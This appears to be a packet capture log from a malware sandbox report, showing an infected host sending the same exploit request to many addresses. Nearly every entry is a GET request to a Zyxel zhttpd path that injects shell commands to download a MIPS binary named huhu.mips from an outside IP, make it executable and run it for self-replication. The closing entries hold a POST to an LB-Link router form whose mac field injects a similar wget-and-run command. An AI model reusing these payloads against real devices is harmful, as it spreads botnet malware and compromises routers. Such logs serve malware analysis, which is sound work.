                                                Jan 29, 2024 07:07:42.196918011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2908192.168.2.233369279.132.211.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196943998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2909192.168.2.234535480.1.68.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196991920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2910192.168.2.235255649.185.113.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197031021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2911192.168.2.2357826185.72.200.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197063923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2912192.168.2.233321492.186.252.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197101116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2913192.168.2.2347292164.27.137.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197132111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2914192.168.2.2359618123.166.162.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197173119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2915192.168.2.2344972212.255.238.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197221994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2916192.168.2.2337564108.179.37.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197253942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2917192.168.2.233629695.201.133.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197299004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2918192.168.2.235654298.212.108.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197334051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2919192.168.2.235687889.51.30.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197372913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2920192.168.2.234357817.2.196.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197400093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2921192.168.2.2334116218.87.172.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197453022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2922192.168.2.233775232.233.235.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197499990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2923192.168.2.2360190134.142.33.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197531939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2924192.168.2.2349822174.108.166.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197566032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2925192.168.2.233760631.90.183.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197597980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2926192.168.2.2349856172.124.92.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197635889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2927192.168.2.2337434113.182.70.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197685957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2928192.168.2.233295617.81.180.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197720051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2929192.168.2.2356520124.67.130.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197767019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2930192.168.2.2352710139.91.114.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197799921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2931192.168.2.235134417.154.72.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197838068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2932192.168.2.233599439.88.150.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197871923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2933192.168.2.234585858.53.221.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197921038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2934192.168.2.2357486105.13.252.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.197963953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2935192.168.2.2356566101.85.143.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198007107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2936192.168.2.233456432.186.201.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198031902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2937192.168.2.235816098.66.99.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198085070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2938192.168.2.2359606110.200.116.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198106050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2939192.168.2.2354854117.132.204.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198143005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2940192.168.2.234294488.120.116.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198199987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2941192.168.2.2340282176.216.102.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198239088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2942192.168.2.2334850207.104.237.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198282003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2943192.168.2.235230040.125.34.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198329926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2944192.168.2.2342194195.142.17.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198364973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2945192.168.2.235818240.236.8.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198400021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2946192.168.2.234782013.14.234.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198442936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2947192.168.2.233495831.103.22.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198481083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2948192.168.2.2344158125.249.99.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198513031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2949192.168.2.2343554208.20.208.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198559999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2950192.168.2.2338708201.44.138.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198600054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2951192.168.2.235856819.70.248.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198654890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2952192.168.2.233959634.64.178.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198669910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2953192.168.2.2338840202.1.215.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198705912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2954192.168.2.2342964148.137.118.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198757887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2955192.168.2.234971019.242.58.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198782921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2956192.168.2.2351568143.29.82.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198821068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2957192.168.2.2342956120.210.227.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198868036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2958192.168.2.2355510156.245.108.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198904991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2959192.168.2.2360114201.220.142.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198955059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2960192.168.2.234510272.149.120.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.198980093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2961192.168.2.235984443.193.172.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.199013948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2962192.168.2.2359420201.17.119.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.199042082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2963192.168.2.2344170108.223.22.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.199089050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2964192.168.2.2355772149.30.71.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.202291965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2965192.168.2.234782475.214.218.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.202326059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2966192.168.2.234051423.185.172.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.202356100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2967192.168.2.233612634.239.207.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.202409029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2968192.168.2.2355480186.156.14.1598080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.191431046 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:44.490305901 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
